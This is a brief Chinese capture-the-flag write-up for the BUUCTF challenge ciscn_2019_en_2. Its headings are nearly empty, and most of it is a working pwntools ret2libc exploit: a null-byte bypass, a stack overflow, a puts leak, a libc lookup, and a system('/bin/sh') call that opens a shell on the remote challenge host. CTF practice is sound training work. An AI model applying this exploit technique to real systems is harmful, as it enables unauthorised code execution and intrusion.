BUUCTF-ciscn_2019_en_2(5/100)
一、查保护
二、代码审计
三、过程
\0绕过字符串处理栈溢出
四、脚本
from pwn import *
from LibcSearcher import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sl=lambda x:io.sendline(x)
sla=lambda x,y:io.sendlineafter(x,y)
#io = process('./')
io = remote('node3.buuoj.cn',25950)
elf=ELF('./ciscn_2019_en_2')
sla('Input your choice!','1')
playload='\0'+'a'*(0x50-1)+'b'*8+p64(0x0400c83)+p64(elf.got['puts'])+p64(elf.sym['puts'])+p64(elf.sym['main'])
sla('encrypted',playload)
puts=u64(ru('\n')[:-1].ljust(8,'\0'))
#print(puts)
libc=LibcSearcher('puts',puts)
base=puts-libc.dump('puts')
print(libc)
system=libc.dump('system')+base
str_b=libc.dump('str_bin_sh')+base
sla('choice!\n','1')
payload='\0'+'a'*(0x50-1)+'b'*8+p64(0x04006b9)+p64(0x0400c83)+p64(str_b)+p64(system)
sla('encrypted\n',payload)
io.interactive()
五、总结
老ROP了
浙公网安备 33010602011771号